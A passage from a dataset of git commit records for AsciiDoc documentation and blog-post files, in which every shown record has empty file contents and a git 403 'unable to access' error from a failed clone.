,adessaigne\/camel,objectiser\/camel,anoordover\/camel,sverkera\/camel,davidkarlsen\/camel,akhettar\/camel,cunningt\/camel,nicolaferraro\/camel,Fabryprog\/camel,anoordover\/camel,tdiesler\/camel,Fabryprog\/camel,nikhilvibhav\/camel,kevinearls\/camel,zregvart\/camel,snurmine\/camel,tadayosi\/camel,tdiesler\/camel,jonmcewen\/camel,snurmine\/camel","old_file":"components\/camel-aws\/src\/main\/docs\/aws-mq-component.adoc","new_file":"components\/camel-aws\/src\/main\/docs\/aws-mq-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e752bd6a29a8206042efc1748ab9ac4345c7b76","subject":"Update 2015-11-11-The-Horror.adoc","message":"Update 
2015-11-11-The-Horror.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2015-11-11-The-Horror.adoc","new_file":"_posts\/2015-11-11-The-Horror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01d39e14d89df4c6673dec6f34ac152cb418cdfe","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41029a152b91785d7999f8d4b1e9a431d224f76","subject":"Started working on the translation docs.","message":"Started working on the translation docs.\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/community\/translating.asciidoc","new_file":"manual\/src\/main\/resources\/community\/translating.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e8431f45de1b1e1b880db0526ed21a5a62719b9","subject":"Update 2015-09-17-test.adoc","message":"Update 2015-09-17-test.adoc","repos":"stevenxzhou\/alex1007.github.io,stevenxzhou\/alex1007.github.io,stevenxzhou\/alex1007.github.io","old_file":"_posts\/2015-09-17-test.adoc","new_file":"_posts\/2015-09-17-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stevenxzhou\/alex1007.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3d87fcb1b58ac8f945ac83e6c5fe7d3bab60bf","subject":"Update 2017-11-30-Look.adoc","message":"Update 2017-11-30-Look.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-11-30-Look.adoc","new_file":"_posts\/2017-11-30-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f20da704eee609bab22a0cb5aeedb1b5d5f977fd","subject":"HawkularBTM 0.2.0.Final demo blog","message":"HawkularBTM 0.2.0.Final demo 
blog\n","repos":"jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/22\/hawkular-btm-0.2.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/22\/hawkular-btm-0.2.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17dab842902047f71d57a0bb6bd226c8e86140cb","subject":"Update 2016-02-11-Descomplicando-gulp.adoc","message":"Update 2016-02-11-Descomplicando-gulp.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32224dab00c462b3c1712bce1402005796faa32a","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6389a3f41f008f6e13d03a9bac71cd06131cff46","subject":"Update 2017-02-02-The-Cost-of-Ember.adoc","message":"Update 2017-02-02-The-Cost-of-Ember.adoc","repos":"sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io","old_file":"_posts\/2017-02-02-The-Cost-of-Ember.adoc","new_file":"_posts\/2017-02-02-The-Cost-of-Ember.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/sandersky\/sandersky.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866a65101bd6969e90c68f9d19575d6ffa67ddaf","subject":"Update 2017-04-01-image-File-Reader.adoc","message":"Update 2017-04-01-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e830438b9291b9d14b521a38aedbfc2fc7d115f7","subject":"updating content to use WildFly image and service","message":"updating content to use WildFly image and service\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9549ab489ad2e74ac45ea733fdc8f45477587ad1","subject":"New Utilities section","message":"New Utilities section\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/utilities.adoc","new_file":"docs\/utilities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"055eee7425d00e270f38a7fbfeb88470e0b9345c","subject":"Update 2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","message":"Update 2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","new_file":"_posts\/2017-02-21-Episode-89-Fadgeting-with-your-Dinner-Sausage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92101b39caa8ad07ceead76884bad8ddf820566f","subject":"Update 2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","message":"Update 2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","new_file":"_posts\/2020-03-10-Translate-GLSL-to-SPIRV-for-Vulkan-at-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c10044a323dd07340df9c63d0ef8a33254f53ab","subject":"Update 
2016-04-09-The-Meaning-of-Types.adoc","message":"Update 2016-04-09-The-Meaning-of-Types.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-09-The-Meaning-of-Types.adoc","new_file":"_posts\/2016-04-09-The-Meaning-of-Types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d32de45b336391afaa12266763e74d85802cb2a3","subject":"Update 2017-01-18-FW4SPL-1103-released.adoc","message":"Update 2017-01-18-FW4SPL-1103-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2017-01-18-FW4SPL-1103-released.adoc","new_file":"_posts\/2017-01-18-FW4SPL-1103-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edc61d0c36306f3a76a603c062234674c4483c9c","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"960e60f9e69bc8b17e23893ec576d6fd3379eb52","subject":"y2b create post Apple Thunderbolt Display Unboxing","message":"y2b create post Apple Thunderbolt Display Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-30-Apple-Thunderbolt-Display-Unboxing.adoc","new_file":"_posts\/2012-03-30-Apple-Thunderbolt-Display-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8344353825e4d36fa10bc3ffdd8d75a095e794e6","subject":"Update 2016-12-06-A-Second-Post.adoc","message":"Update 2016-12-06-A-Second-Post.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-A-Second-Post.adoc","new_file":"_posts\/2016-12-06-A-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9ed7e8d95ead7f2d6df2baf6724d0d8b6dd2bd","subject":"Add rest spec","message":"Add rest spec","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/asciidoc\/rest-spec.adoc","new_file":"doc\/src\/main\/asciidoc\/rest-spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': 
The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8526fb1c70ceb81343b7c94c9cf43ce6dc5618c","subject":"Update 2017-06-08-Dogma-und-Methode.adoc","message":"Update 2017-06-08-Dogma-und-Methode.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-06-08-Dogma-und-Methode.adoc","new_file":"_posts\/2017-06-08-Dogma-und-Methode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe6bcaed396b6a0ee55d6a569a397670c88402f7","subject":"Update 2015-03-19-youtubeLoudnessNormalisation.adoc","message":"Update 2015-03-19-youtubeLoudnessNormalisation.adoc","repos":"hanwencheng\/Undepth,hanwencheng\/Undepth,hanwencheng\/Undepth","old_file":"_posts\/2015-03-19-youtubeLoudnessNormalisation.adoc","new_file":"_posts\/2015-03-19-youtubeLoudnessNormalisation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/Undepth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c39e610c96c9bd5351b42c13aa6934d9e8eb1f0f","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3a331759d4eb470244f6eba8fa167024852fe4f","subject":"Update 2015-08-23-Daisies-arent-roses.adoc","message":"Update 2015-08-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adcc0472dc6d58d92964d26ba939bdf5fdc68fd7","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6df1adba52c4f7193f7de8c470a6ddc7a324cbd3","subject":"Update 2017-06-07-Why-You-No-Have-NTP.adoc","message":"Update 
2017-06-07-Why-You-No-Have-NTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-06-07-Why-You-No-Have-NTP.adoc","new_file":"_posts\/2017-06-07-Why-You-No-Have-NTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"496d83368936c56d248f0521cb03fef4c4712d2c","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9772c6d5571e0079358fadb106c6d88c75e59e11","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915078661be3b8aecabf0764b9e09b59f359b1a3","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bbf7e49fbcf43e8d5fbc565cae91cebd8c0f0ef","subject":"Custom email invoice formatter - Initial Commit","message":"Custom email invoice formatter - Initial Commit","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/custom-email-formatter.adoc","new_file":"userguide\/tutorials\/custom-email-formatter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"efbecdf583b74a3ba9ff34c1dd57f757748cc0f7","subject":"AsciiDoc template for API guide.","message":"AsciiDoc template for API guide.\n","repos":"vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market,vtsukur\/spring-rest-black-market","old_file":"src\/docs\/asciidoc\/api-guide.adoc","new_file":"src\/docs\/asciidoc\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vtsukur\/spring-rest-black-market.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4414b1238fe14d099a7b5dde4209c93f28be4768","subject":"y2b create post MacBook Pro 2011 Unboxing (Quad-Core)","message":"y2b create post MacBook Pro 2011 Unboxing (Quad-Core)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-07-MacBook-Pro-2011-Unboxing-QuadCore.adoc","new_file":"_posts\/2011-06-07-MacBook-Pro-2011-Unboxing-QuadCore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6478e048eb75090fcf6f94cbc8a5cc80059d3e39","subject":"Update 2015-06-30-A-few-old-Regular-Expression-tools.adoc","message":"Update 2015-06-30-A-few-old-Regular-Expression-tools.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-30-A-few-old-Regular-Expression-tools.adoc","new_file":"_posts\/2015-06-30-A-few-old-Regular-Expression-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beec98ecc70d0b3915534bd374d85cedf5a00a96","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eee72adde985f8aba37b3ab61d9a630aa466f47","subject":"y2b create post How To Turn Anything Into A Speaker!","message":"y2b create post How To Turn Anything Into A Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-16-How-To-Turn-Anything-Into-A-Speaker.adoc","new_file":"_posts\/2016-09-16-How-To-Turn-Anything-Into-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0467fdf1ced656403bbf66cbffe4a346c21fbe6","subject":"Update 2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","message":"Update 2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","new_file":"_posts\/2016-07-22-Performance-tip-for-tuning-S-Q-L-with-U-N-I-O-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"572cef380b0e403ed0c070392eafa3cd9d52f72c","subject":"Add GoogleCloudPlatform","message":"Add 
GoogleCloudPlatform\n","repos":"Abdennebi\/ProTips","old_file":"GoogleCloudPlatform.adoc","new_file":"GoogleCloudPlatform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f3cdf6c862157bee598e7bf32555fc929996659","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a6b4ae229d991de1869912b5928d2b11139308","subject":"Publish 2016-09-innovation-Engineer-Aruaru.adoc","message":"Publish 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a28037c8fdd5f425790631d919b4354932cbe42b","subject":"Add events page","message":"Add events page\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/events.asciidoc","new_file":"doc\/src\/main\/docs\/events.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9efa91e5b437d7b4a0c8275aaed6e3e2c995e6cf","subject":"add notes for specifying validation rules","message":"add notes for specifying validation rules\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"validation.adoc","new_file":"validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"211834b241905fd4cd464392bda84f2a0cce1096","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"762011df8005e19555c5f72c68ee401bf520e4d8","subject":"Update 2016-03-04-Spying-on-values.adoc","message":"Update 
2016-03-04-Spying-on-values.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-04-Spying-on-values.adoc","new_file":"_posts\/2016-03-04-Spying-on-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a392d31da1968659484a059f4481a8a778e972cb","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io,raytong82\/raytong82.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raytong82\/raytong82.github.io.git\/': The requested URL returned error: 